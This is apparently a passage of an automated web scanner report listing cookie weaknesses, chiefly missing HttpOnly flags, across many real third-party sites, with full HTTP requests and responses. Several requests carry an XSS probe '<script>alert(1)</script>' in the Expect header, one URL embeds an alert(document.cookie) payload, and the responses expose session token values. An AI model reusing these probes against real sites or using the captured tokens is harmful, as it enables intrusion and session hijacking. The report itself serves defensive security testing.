HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Tue, 03 May 2011 10:30:04 GMT
Content-Type: image/x-icon
Connection: keep-alive
Last-Modified: Fri, 21 Nov 2008 21:32:34 GMT
ETag: "57e-45c39c886a080"
Cache-Control: public, max-age=31536000
Expires: Wed, 02 May 2012 10:30:04 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
CF-Cache-Status: HIT
Set-Cookie: __cfduid=d70863eeee52760fadc52e4eef49d29211304418604; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.twilightersanonymous.com
Set-Cookie: __cfduid=d70863eeee52760fadc52e4eef49d29211304418604; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.twilightersanonymous.com
Content-Length: 1406

..............h.......(....... ...........@.................................y...s.....ZmL.....oV|...7.........%...luk......s....&...W.....................vm..............bcZ.........u..zq......
'...
...[SNIP]...

12.74. http://www.whitepage.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whitepage.net
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BIGipServerp-directory=990036746.20480.0000;domain=whitepage.net; expires=Tue, 03-May-2011 12:23:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whitepage.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:53:57 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerp-directory=990036746.20480.0000;domain=whitepage.net; expires=Tue, 03-May-2011 12:23:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 389

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

13. Cookie without HttpOnly flag set previous next
There are 239 instances of this issue:

http://tag.admeld.com/match
http://tag.admeld.com/pixel
http://www.670kboi.com/favicon.ico
http://www.aquascapeonline.com/favicon.ico
http://www.asiorders.com/favicon.ico
http://www.auristechnology.com/favicon.ico
http://www.beangroup.com/favicon.ico
http://www.bikersingle.com/favicon.ico
http://www.biloxi.ms.us/favicon.ico
http://www.cariboucoffee.com/favicon.ico
http://www.carolinarustica.com/favicon.ico
http://www.cholesterollowered.com/favicon.ico
http://www.conscallhome.com/favicon.ico
http://www.costore.com/favicon.ico
http://www.dedicatedserverdir.com/favicon.ico
http://www.divorcemag.com/favicon.ico
http://www.dulcolaxusa.com/favicon.ico
http://www.durangoherald.com/favicon.ico
http://www.elmresources.com/favicon.ico
http://www.endfatigue.com/favicon.ico
http://www.extrabux.com/favicon.ico
http://www.freshpreservingstore.com/favicon.ico
http://www.getfreedental.com/favicon.ico
http://www.governmentgrants.com/favicon.ico
http://www.grayline.com/favicon.ico
http://www.grubhub.com/favicon.ico
http://www.gtop100.com/favicon.ico
http://www.hitsyndication.com/favicon.ico
http://www.hocking.edu/favicon.ico
http://www.homebasedbusinessmatchingservice.com/favicon.ico
http://www.howtradestocksonline.com/favicon.ico
http://www.infowarsshop.com/favicon.ico
http://www.keytrain.com/favicon.ico
http://www.mountainwestbank.com/favicon.ico
http://www.msgcu.org/favicon.ico
http://www.orschelnfarmhome.com/favicon.ico
http://www.outsideinfo.com/favicon.ico
http://www.pages02.net/favicon.ico
http://www.pages05.net/favicon.ico
http://www.positivepromotions.com/favicon.ico
http://www.ricedelman.com/favicon.ico
http://www.ryans.com/favicon.ico
http://www.sanfranrecruiter.com/favicon.ico
http://www.sdstate.edu/favicon.ico
http://www.setonhill.edu/favicon.ico
http://www.sharethatboy.com/favicon.ico
http://www.shawdirect.ca/favicon.ico
http://www.specialops.org/favicon.ico
http://www.superiorpowersports.com/favicon.ico
http://www.swissarmy.com/favicon.ico
http://www.sylvania.com/favicon.ico
http://www.tahoedailytribune.com/favicon.ico
http://www.targetcenter.com/favicon.ico
http://www.teachingtextbooks.com/favicon.ico
http://www.tempcredit.com/favicon.ico
http://www.thelaughtermovie.com/favicon.ico
http://www.tireteam.com/favicon.ico
http://www.tradearca.com/favicon.ico
http://www.trafficstrategies.com/favicon.ico
http://www.travelagentcentral.com/favicon.ico
http://www.udisglutenfree.com/favicon.ico
http://www.unitedfcu.com/favicon.ico
http://www.usairwayscruises.com/favicon.ico
http://www.usavacuum.com/favicon.ico
http://www.usg.com/favicon.ico
http://www.vc.edu/favicon.ico
http://www.vermontjoblink.com/favicon.ico
http://www.we7.com/favicon.ico
http://www.womensenews.org/favicon.ico
http://www.wtma.com/favicon.ico
http://a.collective-media.net/adj/cm.rev_lee/
http://a.tribalfusion.com/displayAd.js
http://a.tribalfusion.com/j.ad
http://a.triggit.com/pxcwicm
http://ad.turn.com/server/pixel.htm
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/imp
http://ads.adbrite.com/adserver/vdi/742697
http://ads.pointroll.com/PortalServe/
http://ads.specificmedia.com/serve/v=5
http://afe.specificclick.net/
http://ak1.abmr.net/is/k.collective-media.net
http://ak1.abmr.net/is/tag.contextweb.com
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://as.casalemedia.com/j
http://b.scorecardresearch.com/b
http://b.voicefive.com/b
http://bh.contextweb.com/bh/rtset
http://cms.quantserve.com/dpixel
http://contextweb-match.dotomi.com/
http://csc.beap.ad.yieldmanager.net/i
http://cw-m.d.chango.com/m/cw
http://d.xp1.ru4.com/activity
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js
http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js
http://h.zedo.com/init/0.20843081758144966/g.gif
http://h.zedo.com/init/0.7280766281441555/g.gif
http://i.w55c.net/ping_match.gif
http://idpix.media6degrees.com/orbserv/hbpix
http://image2.pubmatic.com/AdServer/Pug
http://k.collective-media.net/cmadj/cm.rev_lee/
http://l.betrad.com/ct/0_0_0_0_179_1228/us/0/1/0/0/0/0/1/242/279/0/pixel.gif
http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673
http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s28735217744881
http://open.ad.yieldmanager.net/a1
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif
http://pixel.rubiconproject.com/tap.php
http://r.openx.net/set
http://r.turn.com/r/bd
http://r1-ads.ace.advertising.com/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1
http://rs.gwallet.com/r1/pixel/x420r7209935
http://servedby.flashtalking.com/imp/3/15881
http://sync.mathtag.com/sync/img
http://tag.contextweb.com/TagPublish/getad.aspx
http://tags.bluekai.com/site/2731
http://tags.bluekai.com/site/3358
http://www.3stepads.com/favicon.ico
http://www.accu-chek.com/favicon.ico
http://www.aiche.org/favicon.ico
http://www.aionarmory.com/favicon.ico
http://www.allentate.com/favicon.ico
http://www.americaneducationnetwork.com/favicon.ico
http://www.ashop.com.au/favicon.ico
http://www.asme.org/favicon.ico
http://www.ataglance.com/favicon.ico
http://www.autozonepro.com/favicon.ico
http://www.awardhq.com/favicon.ico
http://www.bcbsga.com/favicon.ico
http://www.bfcu.org/favicon.ico
http://www.bhgrealestate.com/favicon.ico
http://www.bigtitcreampie.com/favicon.ico
http://www.bloomu.edu/favicon.ico
http://www.bucknell.edu/favicon.ico
http://www.buymebeauty.com/favicon.ico
http://www.bvonstyle.com/favicon.ico
http://www.cafe.com/favicon.ico
http://www.cbmove.com/favicon.ico
http://www.charter-business.com/favicon.ico
http://www.chefuniforms.com/favicon.ico
http://www.cityofheroes.com/favicon.ico
http://www.click-now.net/favicon.ico
http://www.clickmycredit.com/favicon.ico
http://www.coloniallife.com/favicon.ico
http://www.creditacceptance.com/favicon.ico
http://www.dinnerplates.com/favicon.ico
http://www.eatdrinkbetter.com/favicon.ico
http://www.einsurancemarket.com/favicon.ico
http://www.ej.ru/favicon.ico
http://www.expressionery.com/favicon.ico
http://www.eztradein.com/favicon.ico
http://www.familycorner.com/favicon.ico
http://www.foodsaver.com/favicon.ico
http://www.fr.st/favicon.ico
http://www.france3.fr/favicon.ico
http://www.freebeerandhotwings.com/favicon.ico
http://www.freightlinertrucks.com/favicon.ico
http://www.fujifilmusa.com/favicon.ico
http://www.gardens.com/favicon.ico
http://www.gecu-ep.org/favicon.ico
http://www.getastrology.com/favicon.ico
http://www.gigamoves.com/favicon.ico
http://www.girlfriendorgasms.com/favicon.ico
http://www.gravitydefyer.com/favicon.ico
http://www.greentreepayday.com/favicon.ico
http://www.gsmls.com/favicon.ico
http://www.gwinnettcounty.com/favicon.ico
http://www.hcr-manorcare.com/favicon.ico
http://www.hlj.com/favicon.ico
http://www.humana-military.com/favicon.ico
http://www.imoutdoorsmedia.com/favicon.ico
http://www.indthegap.com/favicon.ico
http://www.ipipeline.com/favicon.ico
http://www.itsmarta.com/favicon.ico
http://www.jjc.edu/favicon.ico
http://www.kjct8.com/favicon.ico
http://www.ksfcu.org/favicon.ico
http://www.lacounty.info/favicon.ico
http://www.lasvegasshows.com/favicon.ico
http://www.learnatest.com/favicon.ico
http://www.livingwithout.com/favicon.ico
http://www.locox.com/favicon.ico
http://www.mailfromftd.com/favicon.ico
http://www.make-life-easier.com/favicon.ico
http://www.mem.com/favicon.ico
http://www.michie.com/favicon.ico
http://www.microsofthup.com/favicon.ico
http://www.monsterjam.com/favicon.ico
http://www.movieretriever.com/favicon.ico
http://www.mychasebonus.com/favicon.ico
http://www.myeecu.org/favicon.ico
http://www.myleather.com/favicon.ico
http://www.noisecreep.com/favicon.ico
http://www.northstarmls.com/favicon.ico
http://www.nwahomepage.com/favicon.ico
http://www.occasions365.com/favicon.ico
http://www.ocfl.net/favicon.ico
http://www.oilshalegas.com/favicon.ico
http://www.onedollaremailoffer.com/favicon.ico
http://www.orderupdate.info/favicon.ico
http://www.orthohomedefense.com/favicon.ico
http://www.ovationhair.com/favicon.ico
http://www.petsupplies.com/favicon.ico
http://www.photos-naturistes.fr/favicon.ico
http://www.prosolutionpills.com/favicon.ico
http://www.prostaff.com/favicon.ico
http://www.quiltersclubofamerica.com/favicon.ico
http://www.quotit.net/favicon.ico
http://www.realestateagentsfinder.com/favicon.ico
http://www.realhog.com/favicon.ico
http://www.rlcarriers.com/favicon.ico
http://www.rotary.org/favicon.ico
http://www.schneider.com/favicon.ico
http://www.smartbuyingsite.com/favicon.ico
http://www.smashbox.com/favicon.ico
http://www.smccme.edu/favicon.ico
http://www.songselect.com/favicon.ico
http://www.specialolympics.org/favicon.ico
http://www.stjulien.com/favicon.ico
http://www.sueddeutsche.de/favicon.ico
http://www.superstreetonline.com/favicon.ico
http://www.surveymk.com/favicon.ico
http://www.swiss.com/favicon.ico
http://www.tapartoche.com/favicon.ico
http://www.thinkfashion.com/favicon.ico
http://www.tldm.org/favicon.ico
http://www.trade-schools.net/favicon.ico
http://www.tvrepairman.com/favicon.ico
http://www.twilightersanonymous.com/favicon.ico
http://www.twoofus.org/favicon.ico
http://www.upmystreet.com/favicon.ico
http://www.vitamin-insight.com/favicon.ico
http://www.webcpa.com/favicon.ico
http://www.whitepage.net/favicon.ico
http://www.worldfriends.tv/favicon.ico
http://www.yadvashem.org/favicon.ico
http://www.zegeridotc.com/favicon.ico

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

13.1. http://tag.admeld.com/match previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tag.admeld.com
Path:	/match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

meld_sess=8ba80a63-d76b-4acf-9da4-ae134cb246ff;expires=Wed, 02 May 2012 15:41:36 GMT;path=/;domain=tag.admeld.com;

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /match?admeld_adprovider_id=24&external_user_id=3658195966029417970 HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 35
Content-Type: image/gif
Date: Tue, 03 May 2011 15:41:36 GMT
Connection: close
Set-Cookie: meld_sess=8ba80a63-d76b-4acf-9da4-ae134cb246ff;expires=Wed, 02 May 2012 15:41:36 GMT;path=/;domain=tag.admeld.com;

GIF89a.......,.................D..;

13.2. http://tag.admeld.com/pixel previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://tag.admeld.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

meld_sess=4b319caa-9644-4071-83de-06df4b2feb00;expires=Wed, 02 May 2012 15:41:33 GMT;path=/;domain=tag.admeld.com;

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?admeld_adprovider_id=8&_segment=2%7CRiC6i2pCL3Ub%7C HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bh.contextweb.com/bh/drts?Rand=1324671199

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 35
Content-Type: image/gif
Date: Tue, 03 May 2011 15:41:33 GMT
Connection: close
Set-Cookie: meld_sess=4b319caa-9644-4071-83de-06df4b2feb00;expires=Wed, 02 May 2012 15:41:33 GMT;path=/;domain=tag.admeld.com;

GIF89a.......,.................D..;

13.3. http://www.670kboi.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.670kboi.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDAQSSTTAQ=INJJMFKDEIBBPNOGEPOLFAKM; path=/
NSC_DjubefmTjuft=ffffffff09021e5445525d5f4f58455e445a4a423660;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.670kboi.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 69
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDAQSSTTAQ=INJJMFKDEIBBPNOGEPOLFAKM; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021e5445525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.670kboi.com:80/favicon.ico

13.4. http://www.aquascapeonline.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aquascapeonline.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDCACTACRQ=OFGIAFJDIMPEBBLGAAHOPJLJ; path=/
s=%3A%3A; expires=Wed, 04-May-2011 10:46:08 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aquascapeonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Content-Length: 20583
Content-Type: text/html
Set-Cookie: language=en; expires=Thu, 02-Jun-2011 10:46:08 GMT; path=/
Set-Cookie: CurrencyCode=USD; expires=Thu, 02-Jun-2011 10:46:08 GMT; path=/
Set-Cookie: Refer=; expires=Wed, 04-May-2011 10:46:08 GMT; path=/
Set-Cookie: s=%3A%3A; expires=Wed, 04-May-2011 10:46:08 GMT; path=/
Set-Cookie: ASPSESSIONIDCACTACRQ=OFGIAFJDIMPEBBLGAAHOPJLJ; path=/
Cache-control: private

<!-- ******************************************
MAY NOT BE REMOVED

CandyPress Shopping Cart Version 3.3
http://www.candypress.com
Copyright 2005 by Shopping Tree, Inc.

MAY NOT BE REM
...[SNIP]...

13.5. http://www.asiorders.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.asiorders.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSSCBDQDA=HMJFECODJNDOALAOGEBMMOOD; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.asiorders.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Date: Tue, 03 May 2011 10:17:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.asiorders.com/msgbox.asp?M=%3Ch3%3EPage+not+found%3C%2Fh3%3EOops%21+The+Web+address+you+entered+is+not+a+functioning+page+on+our+site%2E%3Cbr+%2F%3E%3Cbr+%2F%3EPress+OK+to+go+to+our+home+page%2E%3Cbr+%2F%3E%3Cbr+%2F%3E&G=http%3A%2F%2Fwww%2Easiorders%2Ecom%2Fdefault%2Easp
Content-Length: 407
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCBDQDA=HMJFECODJNDOALAOGEBMMOOD; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.asiorders.com/msgbox.asp?M=%3Ch3%3EPage+not+found%3C%2Fh3%3EOops%21+The+Web+address+you
...[SNIP]...

13.6. http://www.auristechnology.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.auristechnology.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCABTTBSC=MFKAPIKDNHLIIEIBGAEOPAFA; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.auristechnology.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Date: Tue, 03 May 2011 10:34:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.auris.com/home/
Content-Length: 147
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCABTTBSC=MFKAPIKDNHLIIEIBGAEOPAFA; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.auris.com/home/">here</a>.</body>

13.7. http://www.beangroup.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.beangroup.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=gfroa8vqhtffhi950f4k64hl14; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beangroup.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:25:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=gfroa8vqhtffhi950f4k64hl14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate, post-check=3600, pre-check=3600
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 113300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<meta http-equ
...[SNIP]...

13.8. http://www.bikersingle.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bikersingle.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCSTSSSAT=PNGDKFFDNIOMOEEIOLACAFIF; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bikersingle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.9. http://www.biloxi.ms.us/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.biloxi.ms.us
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDACDCTDBD=HIPLJJNDPKDPJAFIECEHINBC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biloxi.ms.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:16 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 30501
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACDCTDBD=HIPLJJNDPKDPJAFIECEHINBC; path=/
Cache-control: private

<html>
<head>

<title>City of Biloxi</title>
<!-- InstanceEndEd
...[SNIP]...

13.10. http://www.cariboucoffee.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cariboucoffee.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=785E4739A73480D195A439030BC6FA9E; Path=/
VLTALT=33103665#www.cariboucoffee.com; Domain=.cariboucoffee.com; Path=/
AWSELB=3389D795106F522A5402DFE94ED1A41D942AD83E85A9A2699A29C61EE1F1F18A975B0EA7B44E2B337742AFD68524F942C7B4C46624DDBE1CAF9DBB2D84B8E80FAFE7B07A2D3943DE8CE7325D2BDC228E00690A4C27;PATH=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cariboucoffee.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.11. http://www.carolinarustica.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.carolinarustica.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCASTBBTB=BIFKLHNDBAGKGALHCPLNJOHN; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.carolinarustica.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 191
Content-Type: text/html
Location: /favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCASTBBTB=BIFKLHNDBAGKGALHCPLNJOHN; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:24:45 GMT

<meta http-equiv="refresh" content="3;url=/default.aspx?code=404"><a href="default.aspx">Click here to continue to the website.</a> You should be redirected automatically in a few seconds...

13.12. http://www.cholesterollowered.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cholesterollowered.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=f11b0d9b1b2c841e1f9a3e13ce67d91b; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cholesterollowered.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=f11b0d9b1b2c841e1f9a3e13ce67d91b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: image/vnd.microsoft.icon

13.13. http://www.conscallhome.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.conscallhome.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=276976;expires=Thu, 25-Apr-2041 10:42:55 GMT;path=/
CFTOKEN=85670812;expires=Thu, 25-Apr-2041 10:42:55 GMT;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.conscallhome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

13.14. http://www.costore.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.costore.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDASQRBDRA=JIPDPLNDIHOLKJGBFGEHHICM; path=/
BNES_ASPSESSIONIDASQRBDRA=3o7S5z+ZI9Bg6c1d7LDIgrytASEWNcVVvUpkrT2mTTpLTOrbXf9hGnceJ4HLeNbGYdMc7Flzmry8b7OjbbOTLhlD7u/ZmAOLw7YQk4ynvZqGWV2J97ON7w==; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.costore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:31:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5632
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASQRBDRA=JIPDPLNDIHOLKJGBFGEHHICM; path=/
Cache-control: private
